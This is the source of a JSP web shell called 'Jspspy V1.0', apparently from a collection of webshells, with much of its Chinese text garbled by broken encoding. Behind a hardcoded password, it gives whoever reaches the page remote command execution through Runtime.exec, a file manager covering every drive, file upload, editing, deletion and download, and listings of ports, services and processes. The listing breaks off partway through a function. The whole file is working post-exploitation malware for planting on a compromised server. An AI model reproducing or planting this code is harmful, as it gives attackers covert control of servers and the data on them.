webshell/jsp/jsp.txt

1066 lines
41 KiB
Text
Raw Normal View History

2014-05-22 01:23:10 +00:00
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0036)http://localhost:8080/test/shell.jsp -->
<HTML><HEAD><TITLE><3E><>Jspspy web~shell V1.0 <20><>MADE by <20><>ˮ<EFBFBD>Ƴ<EFBFBD> QQ:540410588<38><38></TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="<22><>ˮ<EFBFBD>Ƴ<EFBFBD>Jspy web~shell" name=GENERATOR></HEAD>
<%@ page contentType="text/html; charset=GBK" %>
<%@ page import="java.io.*"%>
<%@ page import="java.util.Map"%>
<%@ page import="java.util.HashMap"%>
<%@ page import="java.nio.charset.Charset"%>
<%@ page import="java.util.regex.*"%>
<%@ page import="java.sql.*"%>
<%@ page import="java.util.*"%>
<%@ page import="java.util.zip.*"%>
<%@ page import="javax.servlet.jsp.*"%>
<%@ page import="java.lang.reflect.*"%>
<%@ page import="java.net.*"%>
<%@ page import="java.util.Date"%>
<%@ page import="java.text.*"%>
<%
final String passWord="jspspy";
final String nowURI=request.getRequestURI();
final String webSite_Folder = convertPath(application.getRealPath("/"));
final String AbsPath=application.getRealPath(request.getRequestURI());
File file = new File(AbsPath);
String strAbsPath = file.getParent();
session.setMaxInactiveInterval(6000);
if(session.getAttribute("login")==null){
if(request.getParameter("pass")!=null&&request.getParameter("pass").equals(passWord)){
session.setAttribute("login",passWord);
response.sendRedirect(nowURI);
}
else{
out.print("<body scroll=no bgcolor=#000000><Center style=font-size:13px><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><span style='color:#ffffff'>JspSpy V1.0 <br><br><a href='http://www.nohack.cn' style=\"color:white;\" target='_blank'><3E><><EFBFBD>ڿ<EFBFBD><DABF>ֲ<EFBFBD>ר<EFBFBD><D7A8><EFBFBD><EFBFBD></a></span><form method='post'><span style='color:#ffffff'><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>룺</span><input name='pass' type='password' size='22'> <input type='submit' value='<27><>½'><br><br><br><font color=#3399FF></font><br></div><body>");
}
return;
}
%>
<%!
public static String encodeHTML(String str){
String retStr = "";
retStr = str.replaceAll(" ","&nbsp;");
retStr = str.replaceAll("<","&lt;");
retStr = str.replaceAll(">","&gt;");
retStr= str.replaceAll("\n","<br/>");
retStr = str.replaceAll("\n\r","<br>");
str.replaceAll("&","&amp;");
return retStr;
}
public String strCut(String str, int len) {
String sRet;
//it's explame
len -= 3;
if (str.getBytes().length <= len) {
sRet = str;
} else {
try {
sRet = (new String(str.getBytes(), 0, len, "GBK")) + "...";
} catch (Exception e) {
sRet = str;
}
}
return sRet;
}
String encodeChange(String str)throws Exception{
if(str==null)
return null;
else
return new String(str.getBytes("ISO-8859-1"),"gb2312");
}
String encodeGb2Unicode(String str)throws Exception{
if(str==null)
return null;
else
return new String(str.getBytes("gb2312"),"ISO-8859-1");
}
public String convertPath(String path){
String retStr="";
if(empchk(path)){
path = path.replace('\\','/');
File file = new File(path);
if(file.isDirectory()){
if(!path.endsWith("/")){
path += "/";
}
}
}
retStr += path;
return retStr;
}
public boolean empchk(String str){
if(str==null&&str==""&&(str.trim()).equals("")){
return false;
}
else
return true;
}
public void outP(JspWriter out,String str) throws Exception{
if(empchk(str)){
out.print(str);
}
}
//<2F><><EFBFBD><EFBFBD><EFBFBD>ո<EFBFBD>
public void outE(JspWriter out,int n) throws Exception{
if(n>0){
for(int i=0;i<n;i++){
out.print("&nbsp");
}
}
}
public String sacnRead(String path){
File file = new File(path);
if(file.canRead()){
return "<font face=wingdings size=4>&#252;</font>";
}
else{
return "<font face=wingdings size=4>&#251;</font>";
}
}
public String sacnWrite(String path){
File file = new File(path);
if(file.canWrite()){
return "<font face=wingdings size=4>&#252;</font>";
}
else{
return "<font face=wingdings size=4>&#251;</font>";
}
}
public String sacnHidden(String path){
File file = new File(path);
if(file.isHidden()){
return "<font face=wingdings size=4>&#252;</font>";
}
else{
return "<font face=wingdings size=4>&#251;</font>";
}
}
public String getSize(String path){
File file = new File(path);
long size = file.length();
if(size>=1024*1024*1024){
return new Long(size/1073741824L)+"G";
}else if(size>=1024*1024){
return new Long(size/1048576L)+"M";
}else if(size>=1024){
return new Long(size/1024)+"K";
}else
return size+"B";
}
public String getLastModified(String path) throws Exception{
SimpleDateFormat formatter = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
File file = new File(path);
Date time =new Date(file.lastModified());
//Date now=new Date();
String str_date1 = formatter.format(time); //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD>ʽ<EFBFBD><CABD>
return str_date1;
}
public void mainForm(JspWriter out,String webSite_Folder) throws Exception{
out.print("<table width=100% height=100% border=0 bgcolor=menu>");
out.print("<tr><td height=30 colspan=2>");
out.print("<table width=100% height=25 border=0>");
out.print("<form name=address method=post target=FileFrame onSubmit='checkUrl();'>");
out.print("<tr><td width=60 align=center>FilePath:</td><td>");
out.print("<input name=FolderPath type=text style=\"width:100%\" value='"+webSite_Folder+"'>");
out.print("<input type=hidden name=action value=S>");
out.print("<input type=hidden name=Filename><input type=hidden name = sFileName>");
out.print("</td><td width=100 align=center><a href=\"javascript:checkUrl();\">GOtoLink</a>");
out.print("</td></tr></form></table></td></tr><tr><td width=148>");
out.print("<iframe name=Menu src='?action=M' width=100% height=100% frameborder=2 scrolling=yes></iframe></td>");
out.print("<td width=600>");
out.print("<iframe name=FileFrame src='?action=S&FolderPath="+webSite_Folder+"' width=100% height=100% frameborder=1 scrolling=yes></iframe>");
out.print("</td></tr></table>");
}
public void mainMenu(JspWriter out,String webSite_Folder,String strAbsPath) throws Exception{
out.print("<22>p<EFBFBD><70><EFBFBD>p<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T");
out.print("<div align=\"center\" style=\"width: 100%; height:31; vertical-align:middle ;color: White ; position: relative; filter: glow(color=#00CCFF, strength=5)\"><font face=\"<22><><EFBFBD><EFBFBD>_GB2312\" size=4><3E><><EFBFBD>ڿ<EFBFBD><DABF>ֲ<EFBFBD>ר<EFBFBD><D7A8><EFBFBD><EFBFBD></font> </div> ");
out.print("<22>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>T<EFBFBD>p<EFBFBD><70><EFBFBD>p");
listRoot(out);
out.print("<TR><TD width=100% height=20><A href='javascript:JshowFolder(\""+webSite_Folder+"\");'><B><3E><>վ<EFBFBD><D5BE><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC></B></A></TD></TR>\n");
out.print("<TR><TD width=100% height=20><A href='javascript:JshowFolder(\""+convertPath(strAbsPath)+"\");'><B><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC></B></A></TD></TR>\n");
out.print("<TD height=20><A href='javascript:newFolder(\""+webSite_Folder+"\")'><3E><><EFBFBD>½<EFBFBD>Ŀ¼<C4BF><C2BC></A></TD></TR><TR>\n");
out.print("<TR><TD height=20><A href=\"?action=G\" target=FileFrame><3E><><EFBFBD>½<EFBFBD><C2BD>ı<EFBFBD><C4B1><EFBFBD></A></TD></TR>\n");
out.print("<TR><TD height=20><A href=\"?action=q\" target=FileFrame><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><B><3E>ļ<EFBFBD></B></A></TD></TR>");
out.print("<TR><TD height=20><A href='?action=t' target=FileFrame><3E><><EFBFBD>ϴ<EFBFBD><B><3E>ļ<EFBFBD></TD></TR>");
out.print("<TR><TD onmouseover=\"menu2.style.display=''\" height=22><B>+<2B>ܷ<EFBFBD><DCB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˹<EFBFBD><CBB9>ߡ<EFBFBD></B>\n");
out.print("<div id=menu2 style=\"display:none; width:100%\" onmouseout=\"menu2.style.dispaly='none'\">");
out.print("<a href='?action=U' target=FileFrame><3E><>ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a><br>\n");
out.print("<a href='?action=E' target=FileFrame><3E><>CMD<4D><44><EFBFBD></a><br>\n");
out.print("<a href='?action=w' target=FileFrame><3E><><EFBFBD>ն˹<D5B6><CBB9>ߡ<EFBFBD></a><br>\n");
out.print("<a href='?action=B&command=netstat' target=FileFrame><3E><><EFBFBD>˿<EFBFBD><CBBF>б<EFBFBD><D0B1><EFBFBD></a><br>\n");
out.print("<a href='?action=Z&command=netstart' target=FileFrame><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><D0B1><EFBFBD></a><br>\n");
out.print("<a href='?action=Y&command=tasklist' target=FileFrame><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><D0B1><EFBFBD></a><br>\n");
out.print("<a href='?action=V' target=FileFrame><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̡<EFBFBD></a><br>\n");
out.print("<a href='?action=x' target=FileFrame><3E><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a><br>\n");
out.print("<a href='?action=A' target=FileFrame><3E><>jspy˵<79><CBB5><EFBFBD><EFBFBD></a><br>\n");
out.print("</div>");
}
void listRoot(JspWriter out){
try{
out.print("<TABLE cellSpacing=0 cellPadding=0 width=\"100%\">\n<TBODY>\n<TR>\n<TD height=5></TD></TR>\n<TR><TD>");
out.print("<CENTER><A href=\"\" target=_blank><FONT color=red></FONT></CENTER></A>");
out.print("\n</TD></TR>\n<TR>");
out.print("<td onMouseover=\"menu1.style.display=''\" width=100% height=22><B>+<2B>ܲ鿴Ӳ<E9BFB4>̡<EFBFBD></B>>\n");
out.print("<DIV id=\"menu1\" style=\"DISPLAY:none; onMouseout=menu1.style.display='none'\">\n");
File[] roots=File.listRoots();
for(int i=0;i<roots.length;i++){
out.print("<A href='"+"javascript:JshowFolder(\""+convertPath(roots[i].getPath())+"\")'><3E><><EFBFBD>ش<EFBFBD><D8B4>̣<EFBFBD>"+roots[i].getPath()+"</A><br>\n");
}
out.print("</DIV></TD></TR>");
}catch(Exception e){
}
}
void loginOut(JspWriter out,String nowURI)throws Exception{
//session.removeAttribute("login");
//response.sendRedirect("iframe.jsp");
out.print("gsrc");
out.print("<meta http-equiv=\"refresh\" content=\"2;url=" + nowURI +"\" />\n");
}
public void listFolder(JspWriter out,String path) throws Exception{
int j=0,p=0;int k,y=10000;
path=convertPath(path);
try{
File file = new File(path);
String[] sfiles = file.list();
File[] files = new File[sfiles.length];
String[] reFileName = new String[sfiles.length+1];
String[] abFileName = new String[sfiles.length+1];
k = sfiles.length+1;
//out.print("<22><><EFBFBD><EFBFBD><EFBFBD>ij<EFBFBD><C4B3><EFBFBD>Ϊ"+reFileName.length);
for(int i=0;i<sfiles.length;i++){
files[i] = new File(path+"/"+sfiles[i]);
if(files[i].isDirectory()){
reFileName[j]=(String)files[i].getName();
abFileName[p]=(String)convertPath(files[i].getAbsolutePath());
j++;
p++;
}
else{
reFileName[k-1] = (String)files[i].getName();
abFileName[k-1] = (String)convertPath(files[i].getAbsolutePath());
k--;
}
}
out.print("<TABLE cellSpacing=0 cellPadding=0 width=\"100%\" border=0>");
//out.print("<TBODY>");
for(int i=0;i<sfiles.length;i++){
if(abFileName[i]==null)
y=i;
}
if(sfiles.length>0){
//<2F><><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD>
//out.print("<Tbody>\n");
//out.print("");
out.print("<tr><td align='left'><3E>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD></td><td align='center'><3E><><EFBFBD><EFBFBD></td><td align='center'><3E><>С</td><td align='center'><3E>ɶ<EFBFBD></td><td align='center'><3E><>д</td><td align='center'><3E><><EFBFBD><EFBFBD></td><td align='center'><3E><><EFBFBD><EFBFBD><EFBFBD>޸<EFBFBD>ʱ<EFBFBD><CAB1></td><td align='left'><3E><><EFBFBD>ز<EFBFBD><D8B2><EFBFBD></td></tr>");
for(int i=0;abFileName[i]!=null;i++){
out.print("<tr><td><a href='javascript:JshowFolder(\""+abFileName[i]+"\");'>"+"<font face=\"wingdings\" size=6>&#48;</font>"+strCut(reFileName[i],30)+"</td><td>folder</td><td>"+getSize(abFileName[i])+"</td><td>"+sacnRead(abFileName[i])+"</td><td>"+sacnWrite(abFileName[i])+"</td><td>"+sacnHidden(abFileName[i])+"</td><td>"+getLastModified(abFileName[i])+"</td><td><a href='javascript:JsReName(\""+abFileName[i]+"\",\""+abFileName[i]+"\");'><3E>ƶ<EFBFBD>&nbsp;&nbsp;</a><a href='javascript:JsdelName(\""+abFileName[i]+"\");'>ɾ<><C9BE>&nbsp;&nbsp;</a><a href='javascript:setDate(\""+abFileName[i]+"\")'><3E><EFBFBD><E0BCAD><EFBFBD><EFBFBD>&nbsp;&nbsp;</a><a href='javascript:zipFile(\""+abFileName[i]+"\");'><3E><><EFBFBD><EFBFBD>&nbsp;&nbsp;</a></td></tr>");
}
//<2F><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
out.print("</tr>");
for(int i=sfiles.length;reFileName[i]!=null;i--){
out.print("<tr><td><a href='javascript:JshowFile(\""+reFileName[i]+"\")'>"+"<font face=\"wingdings\" size=5>&#50;</font>"+strCut(reFileName[i],30)+"</td><td>file</td><td>"+getSize(abFileName[i])+"</td><td>"+sacnRead(abFileName[i])+"</td><td>"+sacnWrite(abFileName[i])+"</td><td>"+sacnHidden(abFileName[i])+"</td><td>"+getLastModified(abFileName[i])+"</td><td><a href='javascript:JsReName(\""+abFileName[i]+"\",\""+abFileName[i]+"\");'><3E>ƶ<EFBFBD>&nbsp;&nbsp;</a><a href='javascript:JsdelName(\""+abFileName[i]+"\");'>ɾ<><C9BE>&nbsp;&nbsp;</a><a href='javascript:setDate(\""+abFileName[i]+"\")'><3E><EFBFBD><E0BCAD><EFBFBD><EFBFBD>&nbsp;&nbsp;</a><a href='javascript:JsCoypFile(\""+abFileName[i]+"\",\""+abFileName[i]+"\");'><3E><><EFBFBD><EFBFBD>&nbsp;&nbsp;</a><a href='?action=H&fileName="+abFileName[i]+"'><3E>༭&nbsp;&nbsp;</a><a href='javascript:downFIle(\""+abFileName[i]+"\");'><3E><><EFBFBD><EFBFBD>&nbsp;&nbsp;</a></td></tr>");
}
out.print("</table>");
}
//out.print(y);
}
catch(Exception e){
}
}
public void pExeCmd(JspWriter out,HttpServletRequest request) throws Exception{
out.print("<table class=\"ta\" align=\"center\" border=0 width=100% bgcolor=black>\n");
out.print("<form><tr><td width=\"10%\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td><td><input style=\"width:100%; height:23\"type=text name=cmd value=\"net user\">&nbsp&nbsp&nbsp<td width=\"10%\"><input style=\"height:23;width:100%;background-color:#FFFFFF;border:0px\"type=submit value=<3D>ύ></td><td><input type=hidden name=action value=E></td><tr>\n");
out.print("<tr><td colspan=3><TEXTAREA style=\"width:100%;background-color:#FF80FF ;height=100%\">"+exeCmd(out,request.getParameter("cmd"))+"</TEXTAREA></td></tr>\n");
out.print("</form>");
out.print("</table>");
}
public String exeCmd(JspWriter out,String cmd) throws Exception{
String rStr = "";
if(empchk(cmd)){
int nRet;
InputStreamReader in = null;
Runtime run = Runtime.getRuntime();
Process pro = null;
char[] tmpChar = new char[1024];
try{
pro = run.exec(cmd);
in = new InputStreamReader(pro.getInputStream(),Charset.forName("GB2312"));
while((nRet = in.read(tmpChar,0,1024))!=-1){
rStr += new String(tmpChar,0,nRet);
}
}catch(Exception e){
}
finally {
in.close();
return rStr;
}
}
else
return "empty";
}
public void newFolder(JspWriter out,String nFolder)throws Exception{
if(empchk(nFolder)){
File file = new File(nFolder);
if(file.exists()){
out.print("<script>alert(\"Ŀ¼<C4BF>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD>!\");</script>");
}
else{
if(file.mkdir()){
out.print("<script>alert(\":-)Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>!\");</script>");
//out.print("Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>");
}
else{
out.print("<script>alert(\"Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!\");</script>");
}
}
}
}
public void pnewFile(JspWriter out,String nFile,String webSite_Folder) throws Exception{
out.print("<table align=\"center\" border=0 width=100% bgcolor=black>\n");
out.print("<form method=post action=\"?action=g&choice=r\"><tr><td style=\"width:10%;height:23\"><3E><><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD></td><td><input style=\"width:100%; height:23\"type=text name=fileName value=\""+webSite_Folder+"\"></td></td><td></td><tr>\n");
out.print("<tr><td colspan=2><TEXTAREA name=fileContent style=\"width:100%;background-color:#FF80FF ;height=400\">"+nFile+"</TEXTAREA></td></tr>\n");
out.print("<br><hr><tr><td colspan=2><input name='goback' type='button' value='<27><><EFBFBD><EFBFBD>' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='<27><><EFBFBD><EFBFBD>'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='<27><><EFBFBD><EFBFBD>'></td></tr>");
out.print("</form>");
out.print("</table>");
}
//
public void newFile(JspWriter out,String path,byte[] content,String choice) throws Exception{
File file = new File(path);
if(choice.equals("r")&&file.exists()){
out.print("<22><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br><3E>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ְ<EFBFBD>!");
return;
}
else{
BufferedOutputStream bos = null;
try{
bos = new BufferedOutputStream(new FileOutputStream(path));
bos.write(content,0,content.length);
out.print("<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD><br><br><3E><><EFBFBD><EFBFBD>·<EFBFBD><C2B7>Ϊ<EFBFBD><CEAA>");
out.print(path);
}catch(Exception e){
}
finally{
if(out!=null){
bos.close();
}
}
}
}
public void pupfile(JspWriter out,String path) throws Exception{
out.print("<table class=\"ta\" width='100%'> ");
out.print("<form method=post enctype='multipart/form-data' action='?action=T'> ");
out.print("<tr><td width='40%'><3E><><EFBFBD>ڵ<EFBFBD>·<EFBFBD><C2B7>Ϊ:"+path+"</td><td width='40%'><input style='width:90%' type=file name=file value='<27><><EFBFBD><EFBFBD>'></td><td width='20%'><input type=submit value=<3D>ϴ<EFBFBD> style='background:#ccc;border:2px solid #fff;padding:2px 2px 0px 2px;margin:4px;'></td></tr>");
out.print("</from>");
out.print("</table>");
}
public void uploadFile(JspWriter out,ServletRequest request, String path) throws Exception{
String sRet = "";
File file = null;
InputStream in = null;
path = convertPath(path);
try {
in = request.getInputStream();
byte[] inBytes = new byte[request.getContentLength()];
int nBytes;
int start = 0;
int end = 0;
int size = 1024;
String token = null;
String filePath = null;
//
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD><EFBFBD><EFBFBD>
//
while ((nBytes = in.read(inBytes, start, size)) != -1) {
start += nBytes;
}
in.close();
//
// <20><><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>еõ<D0B5><C3B5>ļ<EFBFBD><C4BC>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD>
//
int i = 0;
byte[] seperator;
while (inBytes[i] != 13) {
i ++;
}
seperator = new byte[i];
for (i = 0; i < seperator.length; i ++) {
seperator[i] = inBytes[i];
}
//
// <20>õ<EFBFBD>Header<65><72><EFBFBD><EFBFBD>
//
String dataHeader = null;
i += 3;
start = i;
while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) {
i ++;
}
end = i - 1;
dataHeader = new String(inBytes, start, end - start + 1);
//
// <20>õ<EFBFBD><C3B5>ļ<EFBFBD><C4BC><EFBFBD>
//
token = "filename=\"";
start = dataHeader.indexOf(token) + token.length();
token = "\"";
end = dataHeader.indexOf(token, start) - 1;
filePath = dataHeader.substring(start, end + 1);
filePath = convertPath(filePath);
String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);
//
// <20>õ<EFBFBD><C3B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>ݿ<EFBFBD>ʼλ<CABC><CEBB>
//
i += 4;
start = i;
//
// ͵<><CDB5><EFBFBD>İ취
//
end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
//
// <20><><EFBFBD><EFBFBD>Ϊ<EFBFBD>ļ<EFBFBD>
//
File newFile = new File(path + fileName);
newFile.createNewFile();
FileOutputStream fos = new FileOutputStream(newFile);
out.print("<22><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br><3E>ļ<EFBFBD>·<EFBFBD><C2B7>Ϊ<EFBFBD><CEAA>"+newFile);
//out.write(inBytes, start, end - start + 1);
fos.write(inBytes, start, end - start + 1);
fos.close();
sRet = fileName;
sRet = "<script language=\"javascript\">\n";
sRet += "alert(\"<22>ļ<EFBFBD><C4BC>ϴ<EFBFBD><CFB4>ɹ<EFBFBD>:" + fileName + "\");\n";
sRet += "</script>\n";
} catch (IOException e) {
sRet = "<script language=\"javascript\">\n";
sRet += "alert(\"<22>ļ<EFBFBD><C4BC>ϴ<EFBFBD>ʧ<EFBFBD><CAA7>\");\n";
sRet += "</script>\n";
}
out.print(sRet);
}
//<2F><>p<EFBFBD><70>ͷ<EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA><EFBFBD><EFBFBD><EFBFBD><ECBAAF>
public void peditFile(JspWriter out,String nFile) throws Exception{
out.print("<table align=\"center\" border=0 width=100% bgcolor=black>\n");
out.print("<form method=post action=\"?action=g&choice=w\"><tr><td style=\"width:10%;height:23\"><3E><><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD></td><td><input style=\"width:100%; height:23\"type=text name=fileName value=\""+nFile+"\"></td></td><td><input type=hidden name=action value=E></td><tr>\n");
out.print("<tr><td colspan=2><TEXTAREA name=fileContent style=\"width:100%;background-color:#FF80FF ;height=400\">"+editFile(out,nFile)+"</TEXTAREA></td></tr>\n");
out.print("<br><hr><tr><td colspan=2><input name='goback' type='button' value='<27><><EFBFBD><EFBFBD>' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='<27><><EFBFBD><EFBFBD>'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='<27><><EFBFBD><EFBFBD>'></td></tr>");
out.print("</form>");
out.print("</table>");
}
public String editFile(JspWriter out,String path) throws Exception {
out.print(path);
File file = new File(path);
String strRet = "";
if(file.exists()&&file.length()>0){
int nRet ;
BufferedInputStream bis = null;
byte[] tmpChar= new byte[1024];
//FileInputStream in = null;
try{
bis = new BufferedInputStream(new FileInputStream(path));
while((nRet=bis.read(tmpChar,0,1024))!=-1){
strRet += new String(tmpChar,0,nRet);
strRet = encodeHTML(strRet);
}
}catch(Exception e){
strRet += "error";
}
finally{
if(bis != null){
bis.close();
}
}
}
return strRet;
}
public void reName(JspWriter out,String sPath,String dpath) throws Exception{
if(empchk(sPath)&&empchk(dpath)){
File dfile = new File(dpath);
File sfile = new File(sPath);
if(dfile.exists()){
out.print("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ<EFBFBD><CABE>\n<><6E><EFBFBD>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>ڣ<EFBFBD><DAA3><EFBFBD><EFBFBD><EFBFBD>");
}
else{
if(sfile.renameTo(dfile)){
out.print("<22><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br><3E>ƶ<EFBFBD><C6B6>ɹ<EFBFBD><C9B9><EFBFBD>");
}
}
}
}
public void delName(JspWriter out,String spath) throws Exception{
if(empchk(spath)){
File file = new File(spath);
if(file.delete()){
out.print("<22><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br>ɾ<><C9BE><EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD>");
}
}
}
public void copyName(JspWriter out,String spath,String dpath) throws Exception{
if(empchk(spath)&&empchk(dpath)){
String retStr="";
File sfile = new File(spath);
File dfile = new File(dpath);
if(dfile.exists()){
out.print("<22><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br><3E><><EFBFBD>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>ڣ<EFBFBD>");
}
else{
FileInputStream fis = new FileInputStream(sfile);
FileOutputStream fos = new FileOutputStream(dfile);
int nRet;
byte[] tempByte = new byte[1024];
try{
while((nRet=fis.read(tempByte,0,1024))!=-1){
fos.write(tempByte,0,nRet);
}
out.print("<22><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br><3E>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>Ƴɹ<C6B3><C9B9><EFBFBD>");
}catch(Exception e){
}
finally{
fis.close();
fos.close();
}
}
}
}
public void downFile(String filePath,HttpServletResponse res) throws Exception{
int nRet;
byte[] buffer=new byte[256];
if(empchk(filePath)){
ServletOutputStream sos = res.getOutputStream();
BufferedInputStream bis = null;
String fName= encodeGb2Unicode((new File(filePath)).getName());
res.reset();
res.setHeader("Content-disposition","attachment;filename=\""+fName+"\"");
try{
bis = new BufferedInputStream(new FileInputStream(filePath));
while((nRet=bis.read(buffer,0,buffer.length))!=-1){
sos.write(buffer,0,nRet);
}
}
catch(Exception e){
}
finally{
sos.close();
bis.close();
}
}
}
void zip(JspWriter out,String sPath, String dpath) throws Exception {
FileOutputStream output = null;
ZipOutputStream zipOutput = null;
try{
output = new FileOutputStream(dpath);
zipOutput = new ZipOutputStream(output);
zipEntry(zipOutput,sPath,sPath,dpath);
}catch(Exception e){
out.print("file zip error");
}finally{
if(zipOutput!=null)zipOutput.close();
}
out.print("zip ok"+dpath);
}
//add the zip entry
void zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath) throws Exception {
String entryName = filePath;
File f = new File(filePath);
if (f.isDirectory()){// check is folder
String[] files = f.list();
for(int i = 0; i < files.length; i++)
zipEntry(zipOs, initPath, filePath + File.separator + files[i],zipPath);
return;
}
String chPh = initPath.substring(initPath.lastIndexOf("/") + 1);//
int idx=initPath.lastIndexOf(chPh);
if (idx != -1) {
entryName = filePath.substring(idx);
}
ZipEntry entry;
entry = new ZipEntry(entryName);
File ff = new File(filePath);
if(ff.getAbsolutePath().equals(zipPath))return;
entry.setSize(ff.length());
entry.setTime(ff.lastModified());
//the CRC efficacy
entry.setCrc(0);
CRC32 crc = new CRC32();
crc.reset();
zipOs.putNextEntry(entry);
int len = 0;
byte[] buffer = new byte[2048];
int bufferLen = 2048;
FileInputStream input =null;
try{
input = new FileInputStream(filePath);
while ((len = input.read(buffer, 0, bufferLen)) != -1) {
zipOs.write(buffer, 0, len);
crc.update(buffer, 0, len);
}
}catch(Exception e){
}finally{
if(input!=null)input.close();
}
entry.setCrc(crc.getValue());
}
public void pfindFile(JspWriter out,HttpServletRequest request) throws Exception{
out.print("<br><3E><>վ<EFBFBD><D5BE>Ŀ¼<C4BF><C2BC>"+request.getRealPath("/")+"<br>");
out.print("<FORM name=form1 action=?action=Q method=post>\n<P><B><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>ƣ<EFBFBD></B>\n<INPUT style=\"BORDER-RIGHT: #999 1px solid; BORDER-TOP: #999 1px solid; BORDER-LEFT: #999 1px solid; BORDER-BOTTOM: #999 1px solid\" size=30 value=index.jsp name=filename>\nע<6E><D7A2>ֻ<EFBFBD><D6BB>д<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD>ִ<EFBFBD>Сд)<BR>\n<><6E><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>Χ: \n <INPUT class=c type=radio checked value='");
out.print(convertPath(request.getRealPath("/")));
